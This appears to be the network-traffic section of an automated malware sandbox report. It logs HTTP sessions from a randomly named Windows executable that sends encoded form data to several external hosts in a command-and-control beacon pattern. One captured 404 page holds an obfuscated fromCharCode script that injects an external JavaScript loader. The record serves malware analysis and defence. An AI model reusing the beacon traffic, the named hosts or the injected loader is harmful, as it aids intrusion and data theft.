                                                                                                                    Data Raw: 31 32 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 92 c1 6e c3 20 0c 86 ef 95 fa 0e 3e b6 92 d5 40 02 a4 51 19 97 4a 3b ee b2 27 c8 12 da 44 6a c8 c4 e8 96 bd fd e4 04 a2 a9 87 ed 80 31 f6 e7 1f 0c e8 2e 0c 37 b3 dd e8 ce d6 ad d1 a1 0f 37 6b 04 13 f0 32 06 78 1e ef ae d5 d9 12 d4 d9 8c 6c 37 fa 6d 6c bf 69 6e ac 0b d6 1b dd f1 c7 8a 8e 1b 9d c5 34 69 7b 93 60 77 ed dd f4 3b 97 cd 6a fa a3 f1 fd 7b 30 9f b5 87 29 c0 13 bc 06 df bb eb e1 e2 c7 e1 dc d5 fe 3c b6 76 a7 18 02 e7 12 a1 aa c8 11 08 9c 49 f2 72 32 0a a1 20 87 1d 11 aa 92 22 84 b3 82 bc 32 86 e6 15 e3 08 8a 23 14 02 39 53 09 5e ab fe d2 17 71 0f 2e 23 40 e4 aa 25 22 16 4d 02 e5 11 41 94 cb 88 95 1c 41 28 04 49 59 9a 29 93 f3 64 18 c3 99 23 64 3e c1 72 9e 24 c1 54 d4 79 58 c9 24 cf ca 45 24 0a 54 18 db 58 23 a9 84 fa 51 39 02 5d ac f8 af 79 95 ef 4f ed d8 dc 07 eb c2 e1 cb f7 c1 ee a6 b0 3f e9 2c 3e 1d bd 65 fc 4c 3f c2 ab eb 02 55 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 12an >@QJ;'Dj1.77k2xl7mlin4i{`w;j{0)<vIr2 "2#9S^q.#@%"MAA(IY)d#d>r$TyX$E$TX#Q9]yO?,>eL?U0


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     35 | 192.168.2.4 | 50037 | 104.21.78.104 | 80 | 5568 | C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Oct 24, 2024 05:09:16.596067905 CEST | 10882 | OUT | POST /vshw/ HTTP/1.1
                                                                                                                    Host: www.ly0.xyz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.ly0.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10300
                                                                                                                    Referer: http://www.ly0.xyz/vshw/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 4a 75 42 30 31 51 4c 52 4d 6f 47 31 7a 35 71 75 2b 58 43 53 6e 4d 61 50 59 36 2f 4a 79 59 7a 53 4e 52 57 6c 37 6f 53 2f 37 54 34 31 30 4c 6b 36 42 52 59 2b 6e 43 7a 32 71 59 48 32 43 31 39 72 75 65 33 2b 4a 75 66 68 59 73 31 69 36 41 36 63 30 35 41 37 48 49 53 4d 61 4c 72 43 6d 53 73 41 2f 61 6e 77 74 6b 47 51 6b 6c 6b 55 70 33 31 2f 68 4a 5a 55 45 2b 4a 6b 46 4a 48 62 69 47 30 48 6a 35 34 78 74 66 31 44 48 6d 51 52 79 6a 6a 7a 6c 45 38 48 73 4d 4f 48 4e 31 79 52 56 62 47 63 72 41 30 78 4b 35 79 59 41 42 34 69 43 71 35 62 63 4e 34 63 61 56 47 74 79 7a 76 6d 31 45 2f 50 74 51 41 6f 50 65 49 63 70 78 49 71 6f 55 7a 64 34 4d 4d 56 45 7a 7a 63 50 4a 48 49 4b 6e 43 69 6c 57 6d 53 4d 55 42 34 7a 58 63 68 70 77 75 6c 44 37 71 6e 4d 2f 42 61 55 39 46 70 2f 42 36 44 72 59 58 79 72 51 77 31 30 4d 4e 49 51 41 75 5a 62 78 76 38 54 2f 6b 47 57 73 46 36 4d 76 68 55 5a 44 67 6f 71 6f 74 63 77 67 2b 42 69 6a 57 35 41 6c 73 63 4a 4a 5a 4f 43 6b 45 58 47 74 36 55 4f 41 4f 6a 49 70 33 6f 7a 67 66 6f 63 2f [TRUNCATED]
                                                                                                                    Data Ascii: Qzj=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 [TRUNCATED]
                                                                                                                     Oct 24, 2024 05:09:17.645891905 CEST | 1103 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 24 Oct 2024 03:09:17 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gW5Y%2BtdrBNn0eCSRxXwz5fNrePCN8Ku0WDxlCdytp%2BM8eAHlk%2Be2fKMj8x7xg72%2Fw4CuRxZHQtM8LQzhOTsDqvSHB5IPmj6AO37SV7cmVjVniXVZXjb2E4uzp27Nzg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8d76c465f8b88c56-DFW
                                                                                                                    Content-Encoding: gzip
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1441&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10882&delivery_rate=0&cwnd=133&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 31 32 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 92 c1 6e c3 20 0c 86 ef 95 fa 0e 3e b6 92 d5 40 02 a4 51 19 97 4a 3b ee b2 27 c8 12 da 44 6a c8 c4 e8 96 bd fd e4 04 a2 a9 87 ed 80 31 f6 e7 1f 0c e8 2e 0c 37 b3 dd e8 ce d6 ad d1 a1 0f 37 6b 04 13 f0 32 06 78 1e ef ae d5 d9 12 d4 d9 8c 6c 37 fa 6d 6c bf 69 6e ac 0b d6 1b dd f1 c7 8a 8e 1b 9d c5 34 69 7b 93 60 77 ed dd f4 3b 97 cd 6a fa a3 f1 fd 7b 30 9f b5 87 29 c0 13 bc 06 df bb eb e1 e2 c7 e1 dc d5 fe 3c b6 76 a7 18 02 e7 12 a1 aa c8 11 08 9c 49 f2 72 32 0a a1 20 87 1d 11 aa 92 22 84 b3 82 bc 32 86 e6 15 e3 08 8a 23 14 02 39 53 09 5e ab fe d2 17 71 0f 2e 23 40 e4 aa 25 22 16 4d 02 e5 11 41 94 cb 88 95 1c 41 28 04 49 59 9a 29 93 f3 64 18 c3 99 23 64 3e c1 72 9e 24 c1 54 d4 79 58 c9 24 cf ca 45 24 0a 54 18 db 58 23 a9 84 fa 51 39 02 5d ac f8 af 79 95 ef 4f ed d8 dc 07 eb c2 e1 cb f7 c1 ee a6 b0 3f e9 2c 3e 1d bd 65 fc 4c 3f c2 ab eb 02 55 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 12an >@QJ;'Dj1.77k2xl7mlin4i{`w;j{0)<vIr2 "2#9S^q.#@%"MAA(IY)d#d>r$TyX$E$TX#Q9]yO?,>eL?U0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 50038 | 104.21.78.104 | 80 | 5568 | C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:09:19.138901949 CEST | 526 | OUT | GET /vshw/?Qzj=EspU2mytRZKz4auAzVKL1tfZdJmh9evbelDltaue1VIW4sYIVCILyk3Sg5ScN2hRjv7eCPLeVYxJkFe87LUrFuvYQ7vdzmgwzIu85Xz/vDtptw9jh7A1S+4=&Znyl=2rnxDB HTTP/1.1
                                                                                                                    Host: www.ly0.xyz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 24, 2024 05:09:20.179879904 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 24 Oct 2024 03:09:20 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jOxXELJguHuA8U6BWE2fDzZO9OKb4o4v4ACi946djCpWWTlsQDk2wBNCbyPLHvExBjPriVkj5%2F2CKJcANSEng4PryUwkwlB%2B4McS%2BrwKk7WQyLCb7bKq93%2FCuUQ%2Bjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8d76c475eda82c93-DFW
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1762&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=526&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 32 35 35 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 73 63 72 69 70 74 3e 76 61 72 20 78 74 20 3d 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 36 30 2c 20 31 31 35 2c 20 39 39 2c 20 31 31 34 2c 20 31 30 35 2c 20 31 31 32 2c 20 31 31 36 2c 20 33 32 2c 20 31 30 38 2c 20 39 37 2c 20 31 31 30 2c 20 31 30 33 2c 20 31 31 37 2c 20 39 37 2c 20 31 30 33 2c 20 31 30 31 2c 20 36 31 2c 20 33 34 2c 31 30 36 2c 20 39 37 2c 20 31 31 38 2c 20 39 37 2c 20 31 31 35 2c 20 39 39 2c 20 31 31 34 2c 20 31 30 35 2c 20 31 31 32 2c 20 31 31 36 2c 20 33 34 2c 20 33 32 2c 20 31 31 35 2c 20 31 31 34 2c 20 39 39 2c 20 36 31 2c 20 33 34 2c 31 30 34 [TRUNCATED]
                                                                                                                    Data Ascii: 255<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body><script>var xt = String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 32, 108, 97, 110, 103, 117, 97, 103, 101, 61, 34,106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 32, 115, 114, 99, 61, 34,104, 116, 116, 112, 115, 58, 47, 47, 115, 111, 46, 55, 56, 57, 121, 121, 100,115, 46, 105, 99, 117, 47, 106, 115, 47, 106, 115, 45, 1
Oct 24, 2024 05:09:20.179960012 CEST | 141 | IN | Data Raw: 31 35 2c 20 31 30 37 2c 20 31 30 30 2c 20 34 36 2c 20 31 30 39 2c 31 30 35 2c 20 31 31 30 2c 20 34 36 2c 20 31 30 36 2c 20 31 31 35 2c 20 33 34 2c 20 36 32 2c 20 36 30 2c 20 34 37 2c 20 31 31 35 2c 20 39 39 2c 20 31 31 34 2c 20 31 30 35 2c 20 31
                                                                                                                    Data Ascii: 15, 107, 100, 46, 109,105, 110, 46, 106, 115, 34, 62, 60, 47, 115, 99, 114, 105, 112, 116, 62);document.write(xt);</script></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 50039 | 68.66.226.116 | 80 | 5568 | C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:09:25.259735107 CEST | 798 | OUT | POST /kgyd/ HTTP/1.1
                                                                                                                    Host: www.myrideguy.net
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.myrideguy.net
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 200
                                                                                                                    Referer: http://www.myrideguy.net/kgyd/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 62 73 66 6e 49 34 4c 52 45 52 53 6d 70 49 56 38 56 6b 47 64 6f 54 4b 49 2b 59 4a 75 4d 34 50 59 42 30 4c 79 67 2b 4e 73 2b 2b 68 4f 36 57 45 44 35 39 6b 4e 49 67 55 4d 33 62 7a 6c 41 42 6d 68 69 74 50 69 65 6d 4c 54 38 6f 52 34 34 34 78 53 62 42 76 75 53 58 43 78 6b 69 32 52 75 31 59 2b 53 72 37 62 6e 4f 69 71 70 66 70 6a 43 6e 65 50 79 64 31 74 49 4b 64 58 58 6c 73 78 65 34 38 66 2b 7a 57 38 6d 70 4e 70 62 4b 39 69 6e 39 48 4a 34 2f 4b 73 48 41 2b 66 64 37 71 39 65 37 6b 65 74 34 77 4c 51 71 64 50 31 6d 64 46 6e 7a 57 79 66 41 74 51 4d 77 41 4a 79 69 70 6a 56 34 5a 4b 53 51 3d 3d
                                                                                                                    Data Ascii: Qzj=bsfnI4LRERSmpIV8VkGdoTKI+YJuM4PYB0Lyg+Ns++hO6WED59kNIgUM3bzlABmhitPiemLT8oR444xSbBvuSXCxki2Ru1Y+Sr7bnOiqpfpjCnePyd1tIKdXXlsxe48f+zW8mpNpbK9in9HJ4/KsHA+fd7q9e7ket4wLQqdP1mdFnzWyfAtQMwAJyipjV4ZKSQ==
Oct 24, 2024 05:09:26.712548018 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Connection: close
                                                                                                                    x-powered-by: PHP/7.4.33
                                                                                                                    x-dns-prefetch-control: on
                                                                                                                    set-cookie: mailchimp_landing_site=https%3A%2F%2Fmyrideguy.net%2Fkgyd%2F; expires=Thu, 21-Nov-2024 03:09:26 GMT; Max-Age=2419200; path=/; secure; SameSite=Strict
                                                                                                                    x-litespeed-tag: b37_HTTP.404
                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                    link: <https://myrideguy.net/wp-json/>; rel="https://api.w.org/"
                                                                                                                    x-litespeed-cache-control: no-cache
                                                                                                                    cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    transfer-encoding: chunked
                                                                                                                    content-encoding: gzip
                                                                                                                    vary: Accept-Encoding
                                                                                                                    date: Thu, 24 Oct 2024 03:09:26 GMT
                                                                                                                    server: LiteSpeed
                                                                                                                    strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                    x-content-type-options: nosniff
                                                                                                                    Data Raw: 34 35 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 7d 6b 77 db b8 d1 f0 e7 e4 9c f7 3f a0 cc f1 13 bb 15 65 5e 74 77 ec d6 97 38 f1 c6 4e dc d8 c9 3e bb cd 1e 1f 88 84 24 c4 14 c9 05 49 cb 8a eb ff fe 9e 01 48 02 a4 a8 8b 65 7b 9f 76 b7 4d 22 02 83 99 c1 60 30 00 06 03 e0 cd 5f 8e 3e 1d 5e fe 72 fe 16 8d e2 b1 b7 f7 f2 0d fc 83 5c ca 76 35 2f 66 1a f2 b0 3f dc d5 88 af 7f b9 d0 50 c8 c8 80 de ee 6a c1 b0 87 46 71 1c 46 bd ed ed 60 18 d6 c7 64 db 8f 5e 69 50 9a 60 77 ef e5 8b 37 63 12 63 e4 8c 30 8b 48 bc ab 7d b9 3c d6 3b 1a da ce 73 7c 3c 26 bb da 0d 25 93 30 60 b1 86 9c c0 8f 89 1f ef 6a 13 ea c6 a3 5d 97 dc 50 87 e8 fc a3 86 a8 4f 63 8a 3d 3d 72 b0 47 76 4d 8e e7 e5 8b 17 6f fe a2 eb 68 df f3 10 f5 d1 27 9f a0 8b b7 9f 50 a3 de ae 1b 48 47 98 06 11 09 ea 4e 30 46 ba be f7 ff 00 3a a6 b1 47 f6 de 6c 8b 7f 21 45 e1 84 05 fd 20 8e 14 3e fc 80 fa 2e b9 15 3c 17 40 87 c4 27 0c c7 01 53 a0 4b 5c 6c ee 9f 7c ba 78 fb 69 4b b0 93 e1 88 1c 46 c3 18 c5 d3 90 ec 6a 38 0c 3d ea e0 98 06 fe b6 e7 fe ed 7b 14 [TRUNCATED]
                                                                                                                    Data Ascii: 459f}kw?e^tw8N>$IHe{vM"`0_>^r\v5/f?PjFqF`d^iP`w7cc0H}<;s|<&%0`j]POc==rGvMoh'PHGN0F:Gl!E >.<@'SK\l|xiKFj8={r<E`^cZOm[6j?#;@Di`aJ`[@02a2$}=_b(Fc2o=
Oct 24, 2024 05:09:26.712635040 CEST | 1236 | IN | Data Raw: 32 26 7e 5c a0 01 e9 27 31 19 2f c7 fe ca 93 a0 61 10 51 a8 bc d6 33 6b 1a 08 56 eb 69 ef 83 31 49 89 2d 42 a3 d5 34 9f dc 0a 44 cb eb 92 d3 bc af ad c3 73 19 8b ca b9 95 73 fe 31 88 d1 71 90 f8 2e e4 33 72 43 83 24 5a c6 9f c2 d9 6f 2a 6f 9f d8
                                                                                                                    Data Ascii: 2&~\'1/aQ3kVi1I-B4Dss1q.3rC$Zo*oWdSK%S`Q ]=5D:y23qB)KxR3ThtYihBv_^P/jRr>IV-L#VZA-1e
Oct 24, 2024 05:09:26.712687016 CEST | 1236 | IN | Data Raw: 00 cc ff 8b cb f7 af bb da 84 51 98 6a e8 e3 c0 25 bd 1b c2 60 ba e2 e9 1e d3 7e ab cd 14 e4 e3 d3 92 92 cc d3 7e bb 63 41 8c 63 d2 33 3b 86 4b 86 2b 76 27 47 e8 74 36 88 ad d0 95 52 fb b0 2d a6 85 d1 f6 24 08 f8 94 93 39 64 1b 47 11 89 a3 6d c7
                                                                                                                    Data Ascii: Qj%`~~cAc3;K+v'Gt6R-$9dGmFu[1`g<D,s9[$2~Nlkc2=0qzT(7S{8A3v=[eY\Y3)LJc&9*9\,C1-aXjxfi%DD14g]'bh5
Oct 24, 2024 05:09:26.712734938 CEST | 1236 | IN | Data Raw: 03 37 bb 05 f4 3e df d2 1f 61 77 6d de 6d db e8 b6 3a b5 57 b6 e9 b8 ce a0 80 7c 4c 5d 3f 53 d8 b5 b4 c7 32 ec 8e 59 7b 65 75 da 8d 81 b3 25 b6 88 b2 0d a8 bc d7 96 77 a1 f8 c6 86 d8 66 aa 82 b1 d2 61 46 54 9f 1b 85 4a b8 dc ae cd 37 26 29 47 60
                                                                                                                    Data Ascii: 7>awmm:W|L]?S2Y{eu%wfaFTJ7&)G`4JM?_/R{OT(1/xE|1K|=|U?p<Yro[XvR"Yu*}Ogreq<`czok-8(-6N
Oct 24, 2024 05:09:26.712783098 CEST | 848 | IN | Data Raw: 8d 03 24 e6 f5 b5 59 47 4a 79 2c e2 ec cc 05 cb 68 ac c7 a1 3a 7e 3e 1f 8f 4a 74 df aa 5c 66 d5 7a 02 26 a5 84 9e 86 47 97 e2 61 e0 63 2f 9b 53 00 8b ea 84 65 2e 8b 88 af 06 e7 b3 90 e2 5b cc a7 a4 b4 32 9f 0f 6f f1 65 9c 2a ed de 5c 55 a8 cd 95
                                                                                                                    Data Ascii: $YGJy,h:~>Jt\fz&Gac/Se.[2oe*\UxU<qZ2V>TW0KO&B*.c~6Lk}uj.Nrl/ IF\8]s=ZE0Z^t:l"h^0*7!^Qei=d
Oct 24, 2024 05:09:26.712835073 CEST | 1236 | IN | Data Raw: 10 33 8d 36 ff 5a 43 2e bd c9 b7 8c a1 e1 cb 1c 40 47 97 1c c0 57 01 19 24 2c 46 36 1b 22 82 56 59 c5 ee 2c 83 55 fc 2e 3b 6a 24 7f 45 89 d9 05 e2 96 12 66 32 af 80 ba c4 dd 2a c4 9c 54 cc 92 97 cc c5 b6 f2 83 0b 10 7c 02 2b 8b d2 49 86 42 52 7a
                                                                                                                    Data Ascii: 36ZC.@GW$,F6"VY,U.;j$Ef2*T|+IBRz&TRqne]Ap+.|k~dQu(OXVJT%x7B1zvfWNJQV&)WWpVk0eR1Tu
Oct 24, 2024 05:09:26.712884903 CEST | 1236 | IN | Data Raw: 86 05 19 96 2e 81 83 bc ea 58 2a 9e 03 01 b9 19 ea 54 aa 39 e1 ec 5e 38 24 2e 86 13 92 5c e9 a9 28 f9 b8 4f 1e 24 fe 34 4f 04 45 85 e4 14 f9 d2 17 82 66 d9 29 75 91 3a f5 07 f0 48 1d d1 23 87 05 9e 87 ea 6a 99 10 0f a9 2f de aa 03 05 c9 9b 31 95
                                                                                                                    Data Ascii: .X*T9^8$.\(O$4OEf)u:H#j/1eg^>`'CV'ZBqzuTCxcUJ>{T}} oTgwFO=l~{d{/&^X}GO'G0$1
Oct 24, 2024 05:09:26.712932110 CEST | 1236 | IN | Data Raw: c0 f2 c6 4c 5d 89 0b 40 17 1a 31 be 33 c4 9f b0 cb a5 d7 58 06 98 3d 4b c8 5d a3 73 20 55 47 6c 6b 2e 54 c1 f9 6a 76 e7 c2 65 f7 16 80 60 1a 73 a1 9c 11 71 ae d3 67 09 17 d3 cd 6d 4a 5e 95 f9 35 81 77 7c 33 8c 15 d6 69 49 65 15 a8 85 95 55 e0 72
                                                                                                                    Data Ascii: L]@13X=K]s UGlk.Tjve`sqgmJ^5w|3iIeUrTEJ4\L4)59>{[}/{F;7`!+N?($|DwjXKH?/&xf7PTZ-
Oct 24, 2024 05:09:26.712980986 CEST | 1236 | IN | Data Raw: 9a 2e 22 ec 86 3a 24 da d6 f6 2e d2 9f 7f 8e 7a 8d 82 10 ea 34 0a c2 3f 45 7d 62 b0 82 e3 c0 a7 d8 83 b6 ba 54 3e ff 14 f5 eb 43 74 97 3f dc d6 f6 0e c4 2f 59 ab ed c4 13 7f e5 33 4e e1 45 9a fd 50 7e 8b 9f 6f c0 e7 21 5c 85 7c 8a 99 71 08 61 37
                                                                                                                    Data Ascii: .":$.z4?E}bT>Ct?/Y3NEP~o!\|qa7j4EYZfU1's]];yN=cp(>|a[rKB7zd!rnw5Z)jU@ap`|ecXCn.45iN
Oct 24, 2024 05:09:26.713033915 CEST | 848 | IN | Data Raw: 56 df eb 2c ac f1 d2 cd cc a6 a3 db 75 1b 19 7a 0b de a4 d5 5b a8 85 0c 78 6d b5 de 84 6f 64 d6 6d 64 d7 db 9e 6e d7 3b 08 fe 98 75 93 ff b1 eb 1d 48 73 4c 54 ef 20 ab 6e 67 90 e9 bf 36 32 50 4b 07 0c 2d bd 75 61 b6 ea 36 6a 22 20 f7 63 6c f0 45
                                                                                                                    Data Ascii: V,uz[xmodmdn;uHsLT ng62PK-ua6j" clE[&2F[F_(BXj7UNJ't{=/bX[Q^#Z^4M1d8X0%900")a)??sc_tO_.tR1.O
Oct 24, 2024 05:09:26.718904018 CEST | 1236 | IN | Data Raw: c2 8c 6b c3 b2 36 ec 7d 3e c1 d9 b0 0e 37 2c 6b e2 1c f0 1e 75 18 f8 03 3a 14 d9 02 8b e8 8b 5f 98 97 26 5a 16 48 03 7e 35 0f 37 ac 63 f1 77 41 30 22 49 76 67 f1 9d f6 e9 34 53 76 ec 14 8d 65 09 46 40 6a fb 21 fd 1c 24 31 89 54 3e d2 82 8e f8 37
                                                                                                                    Data Ascii: k6}>7,ku:_&ZH~57cwA0"Ivg4SveF@j!$1T>71S20o"HsrKh<;sV0$uc7C-y<`Cd<rKU&lk}f<yL?A^7']p'FZ\{t^Dq


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 50040 | 68.66.226.116 | 80 | 5568 | C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:09:27.818133116 CEST | 818 | OUT | POST /kgyd/ HTTP/1.1
                                                                                                                    Host: www.myrideguy.net
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.myrideguy.net
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 220
                                                                                                                    Referer: http://www.myrideguy.net/kgyd/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 62 73 66 6e 49 34 4c 52 45 52 53 6d 76 70 46 38 58 44 53 64 68 54 4b 4a 39 59 4a 75 46 59 50 63 42 30 48 79 67 2b 6b 68 2b 4d 31 4f 39 33 30 44 34 38 6b 4e 50 67 55 4d 34 37 79 74 66 52 6d 71 69 74 54 41 65 69 4c 54 38 6f 46 34 34 34 42 53 62 77 76 74 54 48 43 33 38 53 32 66 71 31 59 2b 53 72 37 62 6e 4f 65 54 70 66 68 6a 43 33 75 50 7a 38 31 73 4f 36 64 55 64 46 73 78 61 34 38 62 2b 7a 57 65 6d 72 6f 30 62 49 56 69 6e 35 44 4a 37 72 65 6a 51 51 2b 5a 53 62 72 73 66 72 67 51 67 74 4e 2f 4f 4c 4a 6a 2f 31 35 41 76 56 48 6f 4f 78 4d 48 65 77 6b 36 76 6c 67 58 59 37 6b 44 4a 59 72 56 4b 72 42 42 41 65 64 77 33 63 44 44 61 62 35 36 68 61 55 3d
                                                                                                                    Data Ascii: Qzj=bsfnI4LRERSmvpF8XDSdhTKJ9YJuFYPcB0Hyg+kh+M1O930D48kNPgUM47ytfRmqitTAeiLT8oF444BSbwvtTHC38S2fq1Y+Sr7bnOeTpfhjC3uPz81sO6dUdFsxa48b+zWemro0bIVin5DJ7rejQQ+ZSbrsfrgQgtN/OLJj/15AvVHoOxMHewk6vlgXY7kDJYrVKrBBAedw3cDDab56haU=
Oct 24, 2024 05:09:29.234895945 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Connection: close
                                                                                                                    x-powered-by: PHP/7.4.33
                                                                                                                    x-dns-prefetch-control: on
                                                                                                                    set-cookie: mailchimp_landing_site=https%3A%2F%2Fmyrideguy.net%2Fkgyd%2F; expires=Thu, 21-Nov-2024 03:09:28 GMT; Max-Age=2419200; path=/; secure; SameSite=Strict
                                                                                                                    x-litespeed-tag: b37_HTTP.404
                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                    link: <https://myrideguy.net/wp-json/>; rel="https://api.w.org/"
                                                                                                                    x-litespeed-cache-control: no-cache
                                                                                                                    cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    transfer-encoding: chunked
                                                                                                                    content-encoding: gzip
                                                                                                                    vary: Accept-Encoding
                                                                                                                    date: Thu, 24 Oct 2024 03:09:29 GMT
                                                                                                                    server: LiteSpeed
                                                                                                                    strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                    x-content-type-options: nosniff
